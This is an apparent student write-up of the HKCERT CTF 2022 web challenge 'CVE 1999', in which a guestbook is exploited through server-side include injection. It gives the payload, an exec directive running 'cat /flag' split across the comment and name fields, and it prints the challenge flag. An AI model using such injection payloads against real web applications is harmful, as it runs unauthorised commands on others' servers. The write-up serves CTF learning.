HKCERT CTF 2022 Writeup - CVE 1999

Web

SunnyLo
Nov 20, 2022 1 min read

CVE 1999 (199 points)

web

Description

Old news is so existing
Web: http://chal-a.hkcert22.pwnable.hk:28229/~matt/guestbook.html, http://chal-b.hkcert22.pwnable.hk:28229/~matt/guestbook.html
Remark: The guestbook will be cleaned up per minute

After looking at the given web link, we can add a guestbook to the system. In addition, by googling CVE 1999, we can found out there’s an exploit for this app https://www.exploit-db.com/exploits/9907. I tried to run it, however there’s no reverse shell happening.

After further testing, it seems that we aren’t able to SSI inject the closing tag. We have to put the closing tag to the name field for some reason, thus the payload will be:

In the comments tag

<!--#exec cmd="cat /flag"

In the name tag

-->
Click to view the flag

hkcert22{DiDu_c0opy_others_FLags_or_c0rnment_brb_Tags}

Hkcert Web
SunnyLo
SunnyLo
HK Student